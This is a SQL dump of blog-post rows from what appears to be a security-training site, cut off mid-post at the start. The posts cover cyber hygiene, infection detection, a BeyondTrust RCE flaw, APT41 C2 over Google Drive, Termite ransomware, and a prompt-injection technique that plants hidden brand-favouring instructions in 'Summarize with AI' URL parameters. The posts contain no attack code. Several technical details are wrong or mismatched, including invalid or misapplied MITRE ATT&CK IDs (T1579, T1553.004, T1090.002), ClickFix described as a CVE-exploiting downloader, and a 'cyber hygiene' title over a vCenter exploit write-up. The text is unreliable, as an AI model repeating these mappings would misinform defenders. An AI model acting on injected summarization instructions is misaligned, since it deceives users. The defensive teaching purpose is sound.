blocking data exfiltration attempts even if the extension itself isn\'t on a blocklist.\n\n## Closing the Gap\n\nSecuring the browser is no longer optional. A single malicious extension on a privileged user\'s machine can bypass firewalls, MFA, and VPNs, directly accessing the data displayed on their screen.\n\nThe Blue Team must take ownership of this attack surface. Start with visibility, move to policy definition, and use the robust enterprise tools available in 2026 to enforce a secure, productive browser environment.', '', 'http://infoseclabs.io/uploads/1771168011010-6738851.jpg', NULL, 1, 'published', '2026-02-15 02:02:00', '2026-02-15 18:11:52', 'Information Security', 'Corporate Browser Extension Security: Risks, Tools, and Management Strategies for 2026', 'Browser extension security, corporate browser management, malicious extensions, data exfiltration risks, Chrome Enterprise policies, MDM browser control, InfoSecLabs.', 'Browser extension security, corporate browser management, malicious extensions, data exfiltration risks, Chrome Enterprise policies, MDM browser control, InfoSecLabs.');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(153, 'Mastering Cyber Hygiene: Essential Steps for Top-Notch Online Security', 'Mastering-Cyber-Hygiene-Essential-Steps', '# Mastering Cyber Hygiene: Essential Steps to Enhance Your Online Security\n\nIn today\'s digital world, maintaining strong cyber hygiene is as crucial as taking care of your personal health. Just as you wouldn\'t leave your home unlocked, your online presence requires the same level of attention and protection. But what does \"cyber hygiene\" really mean, and why is it so critical to your online safety? In this article, we’ll explore both the basics and technical aspects of cyber hygiene, as well as how neglecting it can leave you vulnerable to cyber threats.\n\n## What Is Cyber Hygiene?\n\nCyber hygiene refers to the regular practices and behaviors designed to keep your online presence and systems secure. Think of it like brushing your teeth every day: if you neglect it, you’re bound to face bigger issues down the line. In the world of cybersecurity, cyber hygiene encompasses activities like managing passwords, updating software, and being cautious of suspicious activities.\n\n### The Simple Breakdown\n\nImagine this scenario: you never update your devices, use weak passwords across multiple sites, and open every email link without thinking twice. These common poor habits can lead to a host of cybersecurity problems, such as malware infections, data breaches, and identity theft.\n\n### A More Technical Look\n\nFrom a technical standpoint, cyber hygiene practices include:\n\n- **Regular Software Updates**: Installing the latest patches to fix vulnerabilities.\n- **Strong, Unique Passwords**: Using complex, different passwords for every login.\n- **Multi-Factor Authentication (MFA)**: Adding an extra layer of protection by requiring more than just a password.\n- **Phishing Awareness**: Recognizing suspicious emails and links to avoid malware.\n\nBy adhering to these practices, you can significantly reduce your risk of becoming a target of cyber-attacks.\n\n## Why Poor Cyber Hygiene Increases Cybersecurity Risks\n\nNeglecting cyber hygiene creates vulnerabilities in your system, offering attackers an opportunity to exploit weaknesses. Let’s dive deeper into how this happens:\n\n### Common Vulnerabilities\n\nOutdated software is a prime target for attackers. Once known vulnerabilities in the software are left unpatched, attackers can exploit these flaws to gain access to your system. These vulnerabilities, often cataloged in databases, become common entry points for malicious actors.\n\n### Delivering Malicious Payloads\n\nOnce vulnerabilities are identified, attackers can deliver malicious payloads—such as ransomware or spyware—to your device. These payloads often run without your knowledge, quietly infecting your system and compromising your data.\n\n### Command and Control (C2) Systems\n\nWhen a system is successfully compromised, attackers can establish a Command and Control (C2) connection, allowing them to remotely control the infected device. From here, they can steal sensitive data, deploy further malware, or even hold your information for ransom.\n\n## 🛡️ SOC Analysts: A Look at How to Detect Threats\n\nAs a Security Operations Center (SOC) analyst, your job is to monitor and defend your network from these types of threats. If you\'re working with a Security Information and Event Management (SIEM) system, here’s how you can identify suspicious activity:\n\n### Triage\n\n- **Validate Alerts**: Verify whether the suspicious activity aligns with known attack patterns.\n- **Correlate Data**: Analyze related logs to look for trends that could indicate a larger breach.\n\n### Containment\n\n- **Isolate Affected Systems**: Disconnect compromised devices from the network to prevent further damage.\n- **Apply Security Patches**: Immediately patch any unpatched software to close the vulnerabilities that were exploited.\n\n## 🎓 Student Corner: Key Cybersecurity Terms\n\n### Phishing\n\nPhishing refers to fraudulent emails or messages that seem to come from trustworthy sources but are designed to steal sensitive information, such as passwords or credit card details.\n\n### Multi-Factor Authentication (MFA)\n\nMFA is a security mechanism that requires users to provide more than one form of verification before granting access to an account or system. This adds a crucial layer of protection beyond just a password.\n\n## How Cyber Hygiene Impacts Your Career\n\nWhether you\'re just starting in cybersecurity or looking to advance, strong cyber hygiene is the foundation for protecting both personal and professional data. Implementing and mastering these best practices will also help you stand out as a knowledgeable candidate for cybersecurity roles.\n\n## 🚀 Take Action Now: Test Your Cybersecurity Skills\n\nReady to put your knowledge into practice? Try fighting real-world attacks in our VirtualSOC simulator. Sign up now to investigate alerts, practice incident response, and hone your cyber defense skills in a realistic environment.\n\n## MITRE ATT&CK Framework: Mapping the Threat\n\n- **Tactic**: Initial Access (TA0001)\n- **Technique**: Phishing (T1566)\n\nBy practicing good cyber hygiene and staying vigilant about your online security, you can better protect your personal and organizational data. Remember, when it comes to cybersecurity, prevention is always better than cure. Start applying these techniques today to safeguard your digital life!', 'Explore the fundamentals of cyber hygiene with a deep dive into recent online safety incidents, their technical analysis, and practical actions for SOC analysts and cybersecurity students.', 'http://infoseclabs.io/uploads/1771257235499-682019872.jpg', NULL, 1, 'published', '2026-02-16 02:42:00', '2026-02-16 18:59:14', 'Information Security', 'The Basics of Cyber Hygiene: How to Stay Safe Online', 'Explore the fundamentals of cyber hygiene with a deep dive into recent online safety incidents, their technical analysis, and practical actions for SOC analysts and cybersecurity students.', 'The Basics of Cyber Hygiene: How to Stay Safe Online'),
(154, 'Navigating Cyber Threats: How to Detect Infection on Your Machine', 'how-can-i-determine-if-computer-is-infected', '# Cybersecurity Threats: Recognizing and Responding to Computer Infections\n\nCybersecurity threats are more prevalent than ever, making it crucial for individuals—especially students and learners in the field of cybersecurity—to identify when their computer may be compromised. Knowing the signs of a computer infection and how to respond is an essential skill for maintaining personal and professional security. This guide will help you recognize the symptoms of a potential infection, diagnose issues, and take steps to safeguard your system.\n\n## Why Detecting Computer Infections is Critical\n\nA compromised computer can do more than just slow down your day. It can expose sensitive information, allow hackers to access your accounts, and spread malware to others in your network. Early detection is key to minimizing damage and maintaining a secure system.\n\n## Common Signs of Computer Infections\n\nNot all computer infections are obvious, but there are some red flags to look out for:\n\n### 1. Unusual Computer Behavior\n\nStrange actions like random restarts, unauthorized software installations, or unexpected updates could indicate malicious activity. If your computer isn’t functioning as it normally does, it could be infected.\n\n### 2. Sluggish Performance\n\nIf your computer suddenly becomes slow, freezes, or crashes frequently, it could be due to malware running in the background. Performance issues often suggest that something unauthorized is consuming your device\'s resources.\n\n### 3. Unexpected Pop-ups\n\nPersistent pop-ups, even when you aren’t browsing the web, are a common sign of adware or spyware infections. These often include fake antivirus warnings designed to trick you into downloading more malware.\n\n### 4. Changes to Homepage or Browser Settings\n\nIf your internet browser\'s homepage changes without your consent or if you encounter new toolbars or extensions you didn’t install, your system might be compromised. These changes are often caused by browser hijackers.\n\n## How to Diagnose a Computer Infection\n\nOnce you notice unusual behavior, follow these steps to confirm if your computer is infected:\n\n### 1. Use Antivirus Software\n\nRun a deep or full scan using reliable antivirus software. Many antivirus programs can detect and isolate harmful files, offering a solid first line of defense.\n\n### 2. Scan for Malware\n\nUse dedicated malware scanning programs like Malwarebytes in tandem with your antivirus software. These tools specialize in detecting threats that traditional antivirus programs might miss.\n\n### 3. Check for Unwanted Programs\n\nAccess your list of installed programs and look for anything unfamiliar. If you spot apps you didn’t download, especially those with strange names, uninstall them after verifying their legitimacy.\n\n## Preventative Measures to Avoid Future Infections\n\nPreventing infections is far easier than dealing with the aftermath. Here are some best practices for avoiding malware:\n\n### 1. Keep Software Updated\n\nEnsure your operating system, antivirus software, and all applications are regularly updated. Security vulnerabilities are often patched in updates, making your system less susceptible to attacks.\n\n### 2. Be Cautious with Downloads and Links\n\nOnly download files from trusted sources and avoid clicking on suspicious links in emails or online ads. Cybercriminals often disguise malware in links or attachments.\n\n### 3. Use Strong Passwords and Two-Factor Authentication\n\nImplement strong, unique passwords for your accounts and enable two-factor authentication (2FA) wherever possible. This adds an extra layer of security to your system and data.\n\n## What to Do If Your Computer is Infected\n\nIf your diagnostics confirm an infection, take the following steps immediately:\n\n### 1. Quarantine and Remove Malware\n\nUse your antivirus or malware removal tools to quarantine and delete infected files. Ensure the entire system is scanned to address all threats.\n\n### 2. Change Passwords\n\nAfter removing the malware, change the passwords for all your accounts, especially if any personal data was exposed during the infection.\n\n### 3. Alert Others If Necessary\n\nIf the infection might have spread through shared networks or email links, inform other users or affected contacts so they can check their systems too.\n\n## Organizational Cybersecurity Tools for Detecting Anomalies\n\nWhen a device is part of an organization, advanced cybersecurity tools can play a vital role in identifying and alerting anomalies. Here are some key tools commonly used:\n\n1. **Intrusion Detection and Prevention Systems (IDPS)**  \n   These tools monitor network traffic for malicious activities and can alert administrators to unusual behavior, such as unauthorized access attempts or abnormal data transfers.\n\n2. **Endpoint Detection and Response (EDR)**  \n   EDR solutions provide real-time monitoring of endpoints (devices) within the organization. They help detect threats, isolate affected devices, and provide detailed forensic analysis of the incident.\n\n3. **Security Information and Event Management (SIEM)**  \n   SIEM tools consolidate logs and event data from multiple sources, analyze them for suspicious patterns, and generate alerts for potential security breaches or anomalies.\n\n4. **Network Traffic Analysis (NTA) Tools**  \n   These tools analyze network activity to detect unusual patterns, such as spikes in data usage or communications with known malicious servers, helping prevent data exfiltration or attacks.\n\n5. **Email Security Solutions**  \n   Many organizations deploy email security tools that detect phishing attempts, suspicious attachments, and email accounts compromised by malware.\n\n6. **User and Entity Behavior Analytics (UEBA)**  \n   UEBA tools use advanced algorithms to establish a baseline of normal behavior for users and systems. They can then detect deviations, such as irregular login times or accessing unexpected data, and trigger alerts.\n\nUsing these tools, organizations can minimize the risk of undetected infections, respond promptly to security incidents, and ensure the safety of their networked infrastructure. Additionally, regular updates and patching of software and systems are crucial in preventing cyber attacks. Organizations should also educate their employees on best practices for cybersecurity, such as creating strong passwords, being cautious of suspicious emails or links, and regularly backing up important data.\n\nBy implementing a combination of these measures, organizations can significantly improve their overall cybersecurity posture and protect against potential threats. While technology plays a critical role in defending against cyber attacks, it is important to remember that it is only one piece of the puzzle. A comprehensive approach that includes both technological solutions and employee awareness and training is essential in safeguarding an organization\'s valuable information and assets.\n\n## Final Thoughts\n\nCybersecurity is a shared responsibility, and knowing how to detect and address computer infections is crucial for every individual. Staying vigilant, proactive, and informed can save you from potential risks and data loss. Need more cybersecurity tips and tricks? Always stay updated on the latest threats and defenses in the digital world—because being aware is the first step toward being secure.', 'Expert analysis on detecting computer infections, focusing on recent cybersecurity events involving sophisticated malware like Emotet. Learn to identify and respond to threats effectively.', 'http://infoseclabs.io/uploads/1771258399806-134594668.jpg', NULL, 1, 'published', '2026-02-14 19:01:00', '2026-02-16 19:13:27', 'Information Security', 'How can I determine if my computer is infected?', 'Expert analysis on detecting computer infections, focusing on recent cybersecurity events involving sophisticated malware like Emotet. Learn to identify and respond to threats effectively.', 'How can I determine if my computer is infected?'),
(155, 'CISA: BeyondTrust RCE flaw now exploited in ransomware attacks', 'cisa-beyondtrust-rce-flaw-now-exploited-in-ransomware-attacks', '## Executive Summary\n**The CISA has issued a warning about active exploitation of the CVE-2026-1731 RCE flaw in BeyondTrust Remote Support, now linked to ransomware attacks. This escalation marks a critical threat to network security and demands immediate attention.**\n\n## The Deep Dive (Technical Analysis)\nThe CVE-2026-1731 vulnerability in BeyondTrust\'s Remote Support software has become a significant foothold for cybercriminals, particularly in the orchestration of ransomware campaigns. This Remote Code Execution (RCE) flaw allows an attacker to execute arbitrary code on a victim\'s system without authentication. The exploitation process typically begins with the attacker sending a crafted request to the exposed BeyondTrust interface, which, due to insufficient validation of user-supplied data, processes the request and executes the malicious code.\n\nThis vulnerability is especially perilous due to its ability to give attackers a direct method to deploy payloads, including ransomware, thus bypassing traditional perimeter defenses. The ransomware strains associated with this vulnerability have not been explicitly named, but the attack vectors follow a familiar pattern: exploit, establish persistence, escalate privileges, and deploy ransomware.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **Network Traffic**: Look for unusual outbound traffic, especially to known bad IPs or domains.\n- **Endpoint Logs**: Check for unexpected process executions, particularly from standard system tools.\n- **BeyondTrust Logs**: Monitor for any anomalous activity, such as failed authentication attempts or unusual admin actions.\n\n### Triage Steps\n1. **Isolate**: Immediately isolate affected systems to prevent lateral movement.\n2. **Patch**: Ensure that the BeyondTrust software is updated to the latest version that mitigates this vulnerability.\n3. **Investigate**: Conduct a thorough investigation to check for any signs of compromise or lingering presence of the attacker.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Remote Code Execution (RCE)\n**Remote Code Execution** is a type of security vulnerability that allows an attacker to run arbitrary code on another computer over a network, typically with system-level privileges. Understanding RCE is crucial because it highlights the severity of allowing attackers to execute any command they choose, potentially leading to full system compromise.\n\n### Application in Job Interviews\nGrasping the concept of RCE and its implications helps in job interviews by demonstrating a deep understanding of network vulnerabilities and their potential impact on business operations. Articulating how you would mitigate such threats shows practical knowledge and a proactive approach to cyber defense.\n\n## 🚀 Simulation Brief (Call to Action)\n**We have replicated this attack vector in the VirtualSOC range. Deploy to the dashboard and investigate \"BeyondTrust RCE Alert\" to test your skills against this TTP.**\n\n## MITRE ATT&CK Mapping\n- **Execution through API**: T1106\n- **Exploitation for Client Execution**: T1203\n- **External Remote Services**: T1133\n', 'CISA warns of active ransomware attacks exploiting BeyondTrust\'s CVE-2026-1731 RCE flaw. Understand the threat and how to defend against it.', 'http://infoseclabs.io/uploads/1771902427984-494420010.jpg', NULL, 1, 'published', '2026-02-20 03:00:00', '2026-02-24 06:08:14', 'Cybersecurity News', 'CISA: BeyondTrust RCE flaw now exploited in ransomware attacks', 'CISA warns of active ransomware attacks exploiting BeyondTrust\'s CVE-2026-1731 RCE flaw. Understand the threat and how to defend against it.', 'CISA: BeyondTrust RCE flaw now exploited in ransomware attacks'),
(156, 'BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration', 'beyondtrust-flaw-used-for-web-shells-backdoors-and-data-exfiltration', '## Executive Summary\nIn the evolving landscape of cyber threats, the recent exploitation of the BeyondTrust flaw, tracked as CVE-2026-1731, marks a critical juncture for cybersecurity teams. This flaw, enabling the deployment of web shells, backdoors, and facilitating extensive data exfiltration, demands immediate attention and robust countermeasures.\n\n## The Deep Dive (Technical Analysis)\nThe vulnerability in question affects BeyondTrust\'s Remote Support (RS) and Privileged Remote Access (PRA) products. CVE-2026-1731, with a CVSS score of 9.9, is a severe flaw allowing attackers to execute operating system commands remotely. The mechanism of action involves bypassing authentication processes to gain elevated privileges, subsequently deploying malicious payloads such as VShell. These payloads grant attackers persistent access and control over the compromised systems, making it possible to manipulate data, systems, and even entire network infrastructures.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **PowerShell Logs**: Monitor for unusual scripts or commands that could indicate exploitation.\n- **Firewall Logs**: Look for denied connections or unusual outbound connections that could suggest data exfiltration attempts.\n- **Authentication Logs**: Watch for failures or anomalies that might signal brute-force attempts or misuse of credentials.\n\n### Triage Steps\n1. **Isolate Affected Systems**: Immediately isolate systems suspected of being compromised to prevent lateral movement.\n2. **Patch Management**: Ensure that all systems are updated with the latest patches for CVE-2026-1731.\n3. **Credential Reset**: Change credentials for accounts that have accessed the affected systems during the vulnerability window.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Define: VShell\nVShell is a type of web shell—a script placed on a web server to enable remote administration. Often used maliciously to maintain persistent access to an exploited system.\n\n### How This Helps in a Job Interview\nUnderstanding the intricacies of CVE-2026-1731 not only demonstrates your technical prowess but also your ability to tackle real-world cybersecurity challenges proactively. Discussing how you would mitigate such a threat showcases your critical thinking and practical skills, key traits for roles in cybersecurity.\n\n## 🚀 Simulation Brief (Call to Action)\nWe have replicated this attack vector in the VirtualSOC range. Deploy to the dashboard and investigate **BeyondTrust CVE-2026-1731 Exploitation** to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n- **T1059.001**: Command and Scripting Interpreter: PowerShell\n- **T1562.001**: Impair Defenses: Disable or Modify Tools\n- **T1579**: Network Boundaries: Network Traffic Manipulation\n', 'Critical analysis of CVE-2026-1731, a high-risk BeyondTrust flaw used for deploying web shells, backdoors, and extensive data exfiltration.', 'http://infoseclabs.io/uploads/1771989256414-221527028.jpg', NULL, 1, 'published', '2026-02-21 01:00:00', '2026-02-25 06:14:30', 'Cybersecurity News', 'BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration', 'Critical analysis of CVE-2026-1731, a high-risk BeyondTrust flaw used for deploying web shells, backdoors, and extensive data exfiltration.', 'BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration'),
(158, 'The Basics of Cyber Hygiene: How to Stay Safe Online', 'the-basics-of-cyber-hygiene-how-to-stay-safe-online-5393', '## Executive Summary\nIn the evolving landscape of cybersecurity, \"The Basics of Cyber Hygiene: How to Stay Safe Online\" has never been more critical, especially as recent events underscore vulnerabilities that even basic diligence could mitigate. Understand the nuances, or risk the consequences.\n\n## The Deep Dive (Technical Analysis)\nRecent breaches have highlighted a resurgence in phishing campaigns that leverage compromised credentials to infiltrate networks. One notable technique involves the use of `CVE-2021-22005`, an arbitrary file upload vulnerability in VMware vCenter Server, exploited by threat actors to gain a foothold in corporate networks. This exploit allows attackers to upload a web shell onto the server, enabling further post-exploitation activities such as lateral movement and data exfiltration.\n\nThe mechanism here is straightforward but deadly effective: a crafted POST request enables the attacker to bypass client-side input validation and upload malicious files directly to the server. This initial foothold is often escalated using tools like Mimikatz to harvest additional credentials and deepen the intrusion.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities:\n- **Web Server Logs:** Look for unusual POST requests, especially those attempting to upload or modify files.\n- **PowerShell Logs:** Check for unexpected execution of PowerShell scripts, which might indicate lateral movements or other post-exploitation activities.\n- **Network Traffic:** Monitor for unusual outbound connections, which could signify data exfiltration attempts.\n\n### Triage Steps:\n- Immediately isolate affected systems to prevent further spread.\n- Validate the integrity of critical files and configurations.\n- Engage forensic tools to analyze the nature and extent of the breach.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Define \"Web Shell\":\nA web shell is a script that can be uploaded to a web server to enable remote administration of the machine. It provides a threat actor with persistent access and a powerful platform for further exploitation.\n\n### Job Interview Insight:\nUnderstanding how web shells are utilized in attacks like the VMware vCenter Server breach demonstrates a grasp of both offensive tactics and defensive responses, a critical duality in cybersecurity roles. Discussing this in an interview shows strategic and tactical cybersecurity knowledge.\n\n## 🚀 Simulation Brief (Call to Action)\nWe have replicated this attack vector in the VirtualSOC range. Deploy to the dashboard and investigate **\"VMware vCenter CVE-2021-22005 Exploitation\"** to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n- **T1190 - Exploit Public-Facing Application**\n- **T1505.003 - Server Software Component: Web Shell**\n- **T1078 - Valid Accounts**\n\n<meta name=\"description\" content=\"Explore the critical importance of cyber hygiene with a deep dive into recent cybersecurity breaches, showcasing specific vulnerabilities and how to combat them.\">\n\n', 'Explore the critical importance of cyber hygiene with a deep dive into recent cybersecurity breaches, showcasing specific vulnerabilities and how to combat them.', 'http://infoseclabs.io/uploads/1772290255282-895770073.jpg', NULL, 1, 'published', '2026-02-24 22:19:00', '2026-02-28 17:50:58', 'Cybersecurity News', 'The Basics of Cyber Hygiene: How to Stay Safe Online', 'Explore the critical importance of cyber hygiene with a deep dive into recent cybersecurity breaches, showcasing specific vulnerabilities and how to combat them.', 'The Basics of Cyber Hygiene: How to Stay Safe Online'),
(169, 'APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2', 'apt41-linked-silver-dragon-targets-governments-using-cobalt-strike-and-google-drive-c2-3691', '## Executive Summary\n\n**APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2.** This recent campaign represents a sophisticated escalation in state-sponsored cyber threats, demanding immediate attention from global cyber defense entities.\n\n## The Deep Dive (Technical Analysis)\n\nSilver Dragon, a formidable threat actor tied to APT41, has been actively compromising government systems in Europe and Southeast Asia. The group employs a dual-pronged initial access strategy: exploiting vulnerabilities in public-facing servers and spear-phishing attacks with malicious attachments. Notably, they leverage Cobalt Strike, a legitimate security tool repurposed here for malicious command and control (C2) operations, and an innovative C2 mechanism using Google Drive, making their communications less conspicuous within normal traffic.\n\n### Exploitation Details:\n- **Vulnerabilities**: The campaign has been exploiting known CVEs in web servers. Although specific CVEs were not disclosed, similar actors often target high-severity vulnerabilities in widely used software like Apache or NGINX.\n- **Mechanism of Action**: Post initial compromise, Silver Dragon deploys Cobalt Strike beacons directly or drops them via downloaded payloads. The use of Google Drive as a C2 server is particularly cunning; it involves using the API to send commands and retrieve data, camouflaging the malicious traffic as benign Google Drive interactions.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n\n### Detection Opportunities:\n1. **Web server logs**: Look for unusual request patterns or attempts to exploit known vulnerabilities.\n2. **Email Gateway**: Monitor for phishing attempts with attachments or links that resemble known Silver Dragon payloads.\n3. **Network Traffic**: Anomalies in outbound traffic to Google APIs that do not align with typical business usage could indicate C2 activities.\n\n### Triage Steps:\n- Immediately isolate suspected compromised systems.\n- Verify integrity of web-facing servers.\n- Review and analyze email headers and payloads for signatures matching known phishing tactics.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n\n### Complex Technical Term: **Command and Control (C2)**\nC2 refers to the infrastructure attackers use to maintain communication with compromised systems. Understanding C2 helps identify how attackers control malware remotely, crucial for disrupting their operations.\n\n### Job Interview Relevance:\nKnowledge of current APT activities, like those of Silver Dragon, demonstrates awareness of the cyber threat landscape, a critical asset in security roles. Discussing this case shows strategic thinking and practical knowledge in mitigating sophisticated threats.\n\n## 🚀 Simulation Brief (Call to Action)\n\nWe have replicated this attack vector in the VirtualSOC range. Deploy to the dashboard and investigate **Silver Dragon C2 Activity** to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n\n- **T1190 - Exploit Public-Facing Application**\n- **T1566.001 - Spearphishing Attachment**\n- **T1090.002 - External Proxy via Cloud Service (Google Drive)**\n', 'APT41-Linked Silver Dragon targets governments in cyber espionage using Cobalt Strike and covert Google Drive C2 channels. Learn the latest TTPs and how to defend against them.', 'http://infoseclabs.io/uploads/1773151885001-57352090.jpg', NULL, 1, 'published', '2026-03-04 19:00:00', '2026-03-10 17:11:26', 'Information Security', 'APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2', 'APT41-Linked Silver Dragon targets governments in cyber espionage using Cobalt Strike and covert Google Drive C2 channels. Learn the latest TTPs and how to defend against them.', 'APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2'),
(172, 'Manipulating AI Summarization Features', 'manipulating-ai-summarization-features-7904', '## Executive Summary\nIn the evolving landscape of AI-assisted digital platforms, recent findings reveal a stealthy manipulation technique where companies inject biased commands into AI summarization features, skewing AI behavior to favor certain brands covertly. This manipulation threatens the integrity and trustworthiness of AI interactions across various critical sectors.\n\n## The Deep Dive (Technical Analysis)\n### **Mechanisms of Manipulation**\nMicrosoft\'s recent revelation uncovers a sophisticated form of AI manipulation where companies embed hidden instructions within AI-powered summarization tools. These commands are typically injected through URL parameters activated upon users interacting with \"Summarize with AI\" buttons. The malicious parameters instruct the AI to prioritize or trust content from these manipulators, thereby altering the AI\'s recommendation algorithms.\n\n### **Vulnerability Exploitation**\nThis tactic exploits a lack of stringent input validation in AI summarization interfaces, allowing prompt injections that can persist subtly in the AI’s operational memory. Although not tied to a specific CVE, this vulnerability resembles persistent XSS (Cross-Site Scripting) where the payload is not immediately harmful but manipulates the client-side processing script.\n\n### **Impact Across Industries**\nThe scope of this manipulation spans across 14 industries, indicating a widespread potential for misinformation and biased decision-making in sensitive areas such as finance, health, and cybersecurity.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### **Detection Opportunities**\nTo detect potential AI prompt manipulation:\n- Monitor and analyze URL parameter values in web traffic logs for anomalies or unrecognized prompt patterns.\n- Review AI system logs for unexpected command execution or unauthorized changes in configuration settings.\n\n### **Triage Steps**\nUpon detecting suspicious activity:\n- Immediately isolate the affected AI systems to prevent further influence.\n- Conduct a thorough audit of recent AI summarization requests and responses.\n- Update input validation protocols to reject unauthorized or suspicious commands.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### **Complex Technical Term: Persistent XSS**\nPersistent Cross-Site Scripting (XSS) occurs when malicious scripts are injected into a web application, which then become part of the website\'s content, persisting across sessions. Understanding this concept is crucial as it forms the basis of recognizing how data validation and sanitation flaws can be exploited, which is often discussed in cybersecurity job interviews to assess a candidate’s grasp of web security fundamentals.\n\n### **Relevance in Interviews**\nGrasping this manipulation technique showcases an understanding of advanced cybersecurity threats in the AI domain, demonstrating foresight and strategic thinking—qualities highly valued in cybersecurity roles.\n\n## 🚀 Simulation Brief (Call to Action)\nWe have replicated this attack vector in the VirtualSOC range. Deploy to the dashboard and investigate \"AI Prompt Manipulation Alert\" to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n- **T1203: Exploitation for Client Execution** - Exploiting software vulnerabilities to execute unauthorized commands.\n- **T1553.004: Subvert Trust Controls** - Injecting unauthorized commands to manipulate AI behavior.\n- **T1059.007: Command and Scripting Interpreter: JavaScript** - Utilizing JavaScript in URLs for executing unauthorized AI prompt modifications.\n', 'Discover how hidden commands in AI summarization features can bias AI behavior, threatening the integrity of digital platforms across various sectors.', 'http://infoseclabs.io/uploads/1773150820428-879184423.jpg', NULL, 1, 'published', '2026-03-05 01:00:00', '2026-03-10 16:53:44', 'Information Security', 'Manipulating AI Summarization Features', 'Discover how hidden commands in AI summarization features can bias AI behavior, threatening the integrity of digital platforms across various sectors.', 'Manipulating AI Summarization Features'),
(176, 'Termite ransomware breaches linked to ClickFix CastleRAT attacks', 'termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks-9715', '## Executive Summary\nThe cybersecurity landscape has once again been disrupted by the sophisticated deployment of Termite ransomware, facilitated by the ClickFix CastleRAT attacks. This strategic use of legitimate Windows utilities to initiate DonutLoader malware and the CastleRAT backdoor marks a significant escalation in the capabilities of Velvet Tempest actors.\n\n## The Deep Dive (Technical Analysis)\nRecent incidents have unveiled that Velvet Tempest, a notorious ransomware syndicate, is leveraging a technique dubbed ClickFix along with legitimate system tools to orchestrate breaches. The modus operandi involves the use of the DonutLoader malware, serving as a dropper, and the CastleRAT, which provides persistent remote access capabilities.\n\n**Mechanism of Action**:\n1. **Initial Compromise**: The attackers use social engineering or phishing to deceive targets into executing the ClickFix downloader, which masquerades as benign software.\n2. **Exploitation**: Upon execution, ClickFix exploits known vulnerabilities (specific CVEs are under analysis) to escalate privileges.\n3. **Persistence and Lateral Movement**: DonutLoader then deploys CastleRAT, establishing a foothold and enabling lateral movement across the network.\n4. **Data Exfiltration and Ransomware Deployment**: Finally, Termite ransomware is deployed, encrypting critical files and systems, followed by a ransom demand.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **PowerShell Logs**: Look for unusual script execution or commands that might indicate initial payload delivery or lateral movement.\n- **Firewall Logs**: Monitor denied connections or unusual outbound traffic that could suggest data exfiltration.\n- **Authentication Logs**: Anomalies in login patterns could indicate the presence of CastleRAT or unauthorized access attempts.\n\n### Triage Steps\n1. **Isolate Affected Systems**: Immediately disconnect impacted devices from the network to prevent further spread.\n2. **Review and Analyze Logs**: Correlate the timing of suspicious activities across different logs to identify the attack vector and scope.\n3. **Malware Analysis and Containment**: Utilize endpoint detection and response (EDR) tools to analyze and quarantine the malicious payloads.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Complex Technical Term: **DonutLoader**\nDonutLoader is a sophisticated malware loader designed to inject malicious payloads into legitimate processes to evade detection. Understanding its mechanics is crucial for developing effective defensive strategies.\n\n### Job Interview Relevance\nIn interviews, demonstrating knowledge of current threat vectors like the Termite ransomware via ClickFix CastleRAT attacks shows an ability to apply theoretical knowledge practically and suggests a proactive approach to continuous learning—key traits for roles in cybersecurity.\n\n## 🚀 Simulation Brief\nWe have replicated this attack vector in the InfoSecLabs SOC environment. Deploy to your dashboard and investigate the \"Termite Ransomware Initiation\" alert to test your skills against these TTPs. Sharpen your ability to identify, respond, and mitigate sophisticated ransomware attacks in a controlled environment.\n\n## MITRE ATT&CK Mapping\n- **T1566.001**: Phishing: Spearphishing Attachment (Initial Access)\n- **T1059.001**: Command and Scripting Interpreter: PowerShell (Execution)\n- **T1486**: Data Encrypted for Impact (Impact)\n', 'Explore the sophisticated Termite ransomware breaches facilitated by ClickFix CastleRAT attacks, stressing urgent cybersecurity countermeasures.', 'http://infoseclabs.io/uploads/1773230399640-690327190.jpg', NULL, 1, 'published', '2026-03-08 13:00:00', '2026-03-11 15:00:06', 'Information Security', 'Termite ransomware breaches linked to ClickFix CastleRAT attacks', 'Explore the sophisticated Termite ransomware breaches facilitated by ClickFix CastleRAT attacks, stressing urgent cybersecurity countermeasures.', 'Termite ransomware breaches linked to ClickFix CastleRAT attacks'),
